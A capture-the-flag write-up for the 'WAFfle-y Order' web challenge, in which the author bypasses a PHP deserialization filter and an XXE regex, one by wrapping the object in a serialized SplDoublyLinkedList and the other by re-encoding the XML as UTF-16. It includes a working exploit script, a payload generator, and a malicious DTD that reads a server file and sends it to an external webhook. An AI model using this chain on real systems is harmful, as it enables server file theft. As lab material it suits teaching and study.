WAFfle-y Order
Category: Web
Level: Medium
Code Analysis
Checking out the index.php
we find the PHPSESSID
cookie is serialized:
if ( empty ( $_COOKIE [ 'PHPSESSID' ]))
$user = new UserModel;
$user ->username = substr(uniqid( 'guest_' ), 0 , 10 );
base64_encode(serialize( $user )),
time()+ 60 * 60 * 24 ,
In OrderController.php
we find the deserialization:
$body = file_get_contents( 'php://input' );
$cookie = base64_decode( $_COOKIE [ 'PHPSESSID' ]);
safe_object( $cookie );
$user = unserialize( $cookie );
Before the deserialization the cookie is sanitized by safe_object
method. It checks for unsafe functions starting with __
function safe_object ( $serialized_data )
$matches = [];
$num_matches = preg_match_all( '/(^|;)O:\d+:"([^"]+)"/' , $serialized_data , $matches );
for ( $i = 0 ; $i < $num_matches ; $i ++) {
$methods = get_class_methods( $matches [ 2 ][ $i ]);
foreach ( $methods as $method ) {
if (preg_match( '/^__.*$/' , $method ) != 0 ) {
die ( "Unsafe method: ${method}" );
Having found the deserialization vulnerability, the next step is to find classes that can be exploited by the deserialization vulnerability.
There is a XmlParserModel
class and the __wakeup
method, which is called when the object is deserialized:
class XmlParserModel
private string $data ;
private array $env ;
public function __construct ( $data )
$this ->data = $data ;
public function __wakeup ( )
if (preg_match_all( "/<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]/im" , $this ->data))
die ( 'Unsafe XML' );
$env = @simplexml_load_string( $this ->data, 'SimpleXMLElement' , LIBXML_NOENT);
if (! $env )
die ( 'Malformed XML' );
foreach ( $env as $key => $value )
$_ENV [ $key ] = ( string ) $value ;
In sum, exist a __wakeup
method in XmlParserModel
and object variable $data
with simplexml_load_string
is used as XML
parsing. When deserializing, the vulnerability can give $data
variables arbitrary values that can be created by external entities XXE
However, when $data
is including external entities, it will be replaced by the regular expression /<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]/im
matches, resulting in the call die
and return Unsafe XML
For this, you can UTF-8
encoded XML
document converted to UTF-16
When making the call, the server checks if the cookie is “safe” with safe_object()
. The method finds all matches of serialized objects and gets their respective class methods. If any of the class method contains __
at the beginning (for magic methods exploits), the program dies.
Decoded cookie, the ErrorException contains magic method __construct: O:14:"ErrorException":1:{s:8:"username";s:10:"guest_614c";}
To bypass this restriction, I studied this writeup: https://github.com/MegadodoPublications/exploits/blob/master/composr.md#the-moderately-cool-way-that-works
Objects that implement the Serializable interface contain two methods serialize and unserialize. When serializing such an object a string of the following format will be returned:
C:<number of characters in the class name>:"<class name>":<length of the output of the serialize method>:{<output of the serialize method>}.
Creating a serialized string in this format for an object of a class that doesn’t implement Serializable will work but the deserialized object will not have any class members set. It is thus not very useful for our purposes but it does lead the way to a final working exploit.
Notice the :
before O
. This prevents the regex from matching.
Part of the payload is going to look like this. $pay
is our serialized payload object.
XML WAF bypass
We will serialize XmlParserModel class. It has __wakeup
magic method, and calls simplexml_load_string()
which we will exploit.
With this method, we can do XXE, but have to first bypass the regex check.
The LIBXML_NOENT option allows us to use XML entities.
To bypass the regex, I use UTF-16 encoding on the XML payload.
The simplexml_load_string()
does whats its told to do, and the regex just don’t know what’s going on and lets the payload through.
DTD OOB exfiltration
Free from restraints, we can finally do the XXE with OOB DTD (inspiration). The challenge is internet-enabled. I’m going to fetch the DTD from ngrok which I tunnel to my machine where I host the DTD file. The DTD reads the flag file and make a call to my internet webhook, where a GET parameter contains the flag.
Lets create 3 files.
In exploit.py
we generate php serialized payload and encode using base64. URL encoding is done inplicitly in requests. Insert payload into cookie and make the API call.
import requests
import subprocess
import base64
result = subprocess.run(['php', 'php_pay.php'], stdout=subprocess.PIPE)
rs = result.stdout
pay = base64.b64encode(rs)
pay = pay.decode()
c = {'PHPSESSID': pay}
d = {"table_num":"1","food":"WAFfles"}
r = requests.post('', json=d, cookies=c)
In php_pay.php
we create and xml paylod that will be interpreted by simplexml_load_string(). We tell it to fetch our malicious DTD and execute it. Then we convert the xml into UTF-16BE, serialize it and paste it into our predefined serialized structure.
class XmlParserModel {
public string $data;
public function __construct($data)
$this->data = $data;
/* UTF-16 encoding
* ngrok to malicious.dtd
$xml = '<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://1486-88-212-37-72.ngrok.io/malicious.dtd"> %xxe;]><env><debug>1</debug></env>';
// perform utf-16 conversion (big endian)
$xml = iconv('UTF-8', 'UTF-16BE', $xml);
$pay = serialize(new XmlParserModel($xml));
// 11 is number of chars in {} block apart from variable $pay
$l = 11 + strlen($pay);
echo 'C:19:"SplDoublyLinkedList":' . $l . ':{i:0;:' . $pay . ':i:42;}';
In malicious.dtd
we tell the system to get contents of /flag and encode it using base64. We have to use base64 encoding because the file contains a newline at the end, and the xml entity doesn’t like that. We then instruct the system to make and http call to our webhook which contains the flag as a GET parameter.
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://webhook.site/d1a3d99e-30da-4cb5-8e98-a4922d66f996/?x=%file;'>">
Now we just need to run exploit.py
and get the flag in the webhook.